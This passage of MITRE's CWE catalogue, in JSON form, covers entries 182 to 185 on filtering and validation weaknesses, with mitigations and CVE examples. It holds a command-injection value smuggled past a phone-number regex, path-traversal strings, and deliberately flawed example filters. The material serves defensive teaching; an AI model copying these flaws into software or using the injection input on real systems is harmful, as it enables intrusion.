Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}],"Previous_Entry_Name":{"#text":"Validate-before-filter","attr":{"@_Date":"2008-04-11"}}}},"182":{"attr":{"@_ID":"182","@_Name":"Collapse of Data into Unsafe Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software filters data in a way that causes it to be reduced or \\"collapsed\\" into an unsafe value that violates an expected security property.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"33","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"34","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"35","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."},{"Description":"Canonicalize the name to match that of the file system\'s representation of the name. This can sometimes be achieved with an available API (e.g. in Win32 the GetFullPathName function)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0815","Description":"\\"/.////\\" in pathname collapses to absolute path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2005-3123","Description":"\\"/.//..//////././\\" is collapsed into \\"/.././\\" after \\"..\\" and \\"//\\" sequences are removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123"},{"Reference":"CVE-2002-0325","Description":"\\".../...//\\" collapsed to \\"...\\" due to removal of \\"./\\" in web server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0325"},{"Reference":"CVE-2002-0784","Description":"chain: HTTP server protects against \\"..\\" but allows \\".\\" variants such as \\"////./../.../\\". If the server removes \\"/..\\" sequences, the result would collapse into an unsafe value \\"////../\\" (CWE-182).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0784"},{"Reference":"CVE-2005-2169","Description":"MFV. Regular expression intended to protect against directory traversal reduces \\".../...//\\" to \\"../\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2001-1157","Description":"XSS protection mechanism strips a &lt;script&gt; sequence that is nested in another &lt;script&gt; sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Collapse of Data into Unsafe Value"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS11-J","Entry_Name":"Eliminate noncharacter code points before validation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Character Stripping Vulnerabilities&#34;, Page 437"}}},"Notes":{"Note":{"#text":"Overlaps regular expressions, although an implementation might not necessarily use regexp\'s.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"183":{"attr":{"@_ID":"183","@_Name":"Permissive List of Allowed Inputs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Allowlist / Allow List","Description":"This is used by CWE and CAPEC instead of other commonly-used terms.  Its counterpart is denylist."},{"Term":"Safelist / Safe List","Description":"This is often used by security tools such as firewalls, email or web gateways, proxies, etc."},{"Term":"Whitelist / White List","Description":"This term is frequently used, but usage has been declining as organizations have started to adopt other terms."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12799","Description":"chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799"},{"Reference":"CVE-2019-10458","Description":"sandbox bypass using a method that is on an allowlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458"},{"Reference":"CVE-2017-1000095","Description":"sandbox bypass using unsafe methods that are on an allowlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095"},{"Reference":"CVE-2019-10458","Description":"CI/CD pipeline feature has unsafe elements in allowlist, allowing bypass of script restrictions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458"},{"Reference":"CVE-2017-1000095","Description":"Default allowlist includes unsafe methods, allowing bypass of sandbox","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Permissive Whitelist"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"71"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Eliminating Metacharacters&#34;, Page 435"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Permissive Whitelist","attr":{"@_Date":"2020-02-24"}}}},"184":{"attr":{"@_ID":"184","@_Name":"Incomplete List of Disallowed Inputs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete, leading to resultant weaknesses.","Extended_Description":"Developers often try to protect their products against malicious input by performing tests against inputs that are known to be bad, such as special characters that can invoke new commands.  However, such lists often only account for the most well-known bad inputs. Attackers may be able to find other malicious inputs that were not expected by the developer, allowing them to bypass the intended protection mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"79","@_View_ID":"1000","@_Chain_ID":"692"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"78","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Denylist / Deny List","Description":"This is used by CWE and CAPEC instead of other commonly-used terms.  Its counterpart is allowlist."},{"Term":"Blocklist / Block List","Description":"This is often used by security tools such as firewalls, email or web gateways, proxies, etc."},{"Term":"Blacklist / Black List","Description":"This term is frequently used, but usage has been declining as organizations have started to adopt other terms."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Developers might begin to develop a list of bad inputs as a fast way to fix a particular weakness, instead of fixing the root cause. See [REF-141]."},{"Phase":"Architecture and Design","Note":"The design might rely solely on detection of malicious inputs as a protection mechanism."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"Exploitation of a vulnerability with commonly-used manipulations might fail, but minor variations might succeed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Input Validation","Description":"Do not rely exclusively on detecting disallowed inputs.  There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants.  Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify \\"good\\" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to stop XSS attacks by removing all occurences of \\"script\\" in an input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String removeScriptTags(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Because the code only checks for the lower-case \\"script\\" string, it can be easily defeated with upper-case script tags."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2309","Description":"product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309"},{"Reference":"CVE-2005-2782","Description":"PHP remote file inclusion in web application that filters \\"http\\" and \\"https\\" URLs, but not \\"ftp\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2782"},{"Reference":"CVE-2004-0542","Description":"Programming language does not filter certain shell metacharacters in Windows environment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0542"},{"Reference":"CVE-2004-0595","Description":"XSS filter doesn\'t filter null characters before looking for dangerous tags, which are ignored by web browsers. MIE and validate-before-cleanse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595"},{"Reference":"CVE-2005-3287","Description":"Web-based mail product doesn\'t restrict dangerous extensions such as ASPX on a web server, even though others are prohibited.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3287"},{"Reference":"CVE-2004-2351","Description":"Resultant XSS when only &lt;script&gt; and &lt;style&gt; are checked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2351"},{"Reference":"CVE-2005-2959","Description":"Privileged program does not clear sensitive environment variables that are used by bash. Overlaps multiple interpretation error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2959"},{"Reference":"CVE-2005-1824","Description":"SQL injection protection scheme does not quote the \\"\\\\\\" special character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1824"},{"Reference":"CVE-2005-2184","Description":"Detection of risky filename extensions prevents users from automatically executing .EXE files, but .LNK is accepted, allowing resultant Windows symbolic link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2184"},{"Reference":"CVE-2007-1343","Description":"Product uses list of protected variables, but accidentally omits one dangerous variable, allowing external modification","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1343"},{"Reference":"CVE-2007-5727","Description":"Chain: product only removes SCRIPT tags (CWE-184), enabling XSS (CWE-79)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2006-4308","Description":"Chain: product only checks for use of \\"javascript:\\" tag (CWE-184), allowing XSS (CWE-79) using other tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"},{"Reference":"CVE-2007-3572","Description":"Chain: OS command injection (CWE-78) enabled by using an unexpected character that is not explicitly disallowed (CWE-184)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572"},{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in list of disallowed values for web server, allowing path traversal attacks when the server is run on Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Blacklist"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-141"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Eliminating Metacharacters&#34;, Page 435"}}]},"Notes":{"Note":{"attr":{"@_Type":"Relationship"},"xhtml:p":"Multiple interpretation errors can indirectly introduce inputs that should be disallowed. For example, a list of dangerous shell metacharacters might not include a metacharacter that only has meaning in one particular shell, not all of them; or a check for XSS manipulations might ignore an unusual construct that is supported by one web browser, but not others."}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Description, Detection_Factors, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Incomplete Blacklist","attr":{"@_Date":"2020-02-24"}}}},"185":{"attr":{"@_ID":"185","@_Name":"Incorrect Regular Expression","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software specifies a regular expression in a way that causes data to be improperly matched or compared.","Extended_Description":"When the regular expression is used in protection mechanisms such as filtering or validation, this may allow an attacker to bypass the intended restrictions on the incoming data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"187","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"182","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":["Unexpected State","Varies by Context"],"Note":"When the regular expression is not correctly specified, data might have a different format or type than the rest of the program expects, producing resultant weaknesses or errors."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In PHP, regular expression checks can sometimes be bypassed with a null byte, leading to any number of weaknesses."}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-45"},"Phase":"Architecture and Design","Strategy":"Refactoring","Description":"Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject the regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor the regular expression."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-37"},"Intro_Text":"The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$phone = GetPhoneNumber();if ($phone =~ /\\\\d+-\\\\d+/) {}else {}","xhtml:br":["",""],"xhtml:div":[{"#text":"system(\\"lookup-phone $phone\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"# looks like it only has hyphens and digits","xhtml:br":""},{"#text":"error(\\"malformed number!\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"An attacker could provide an argument such as: \\"; ls -l ; echo 123-456\\" This would pass the check, since \\"123-456\\" is sufficient to match the \\"\\\\d+-\\\\d+\\" portion of the regular expression."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2109","Description":"Regexp isn\'t \\"anchored\\" to the beginning or end, which allows spoofed values that have trusted values as substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109"},{"Reference":"CVE-2005-1949","Description":"Regexp for IP address isn\'t anchored at the end, allowing appending of shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2000-0115","Description":"Local user DoS via invalid regular expressions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0115"},{"Reference":"CVE-2002-1527","Description":"chain: Malformed input generates a regular expression error that leads to information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1527"},{"Reference":"CVE-2005-1061","Description":"Certain strings are later used in a regexp, leading to a resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1061"},{"Reference":"CVE-2005-2169","Description":"MFV. Regular expression intended to protect against directory traversal reduces \\".../...//\\" to \\"../\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2005-1820","Description":"Code injection due to improper quoting of regular expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1820"},{"Reference":"CVE-2005-3153","Description":"Null byte bypasses PHP regexp check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"},{"Reference":"CVE-2005-4155","Description":"Null byte bypasses PHP regexp check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Regular Expression Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 10, &#34;Using Regular Expressions for Checking Input&#34; Page 350"}}},"Notes":{"Note":[{"#text":"While there is some overlap with allowlist/denylist problems, this entry is intended to deal with incorrectly written regular expressions, regardless of their intended use. Not every regular expression is intended for use as an allowlist or denylist. In addition, allowlists and denylists can be implemented using other mechanisms besides regular expressions.","attr":{"@_Type":"Relationship"}},{"#text":"Regexp errors are likely a primary factor in many MFVs, especially those that require multiple manipulations to exploit. However, they are rarely diagnosed at this level of detail.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships, Observed_Example, Other_Notes, 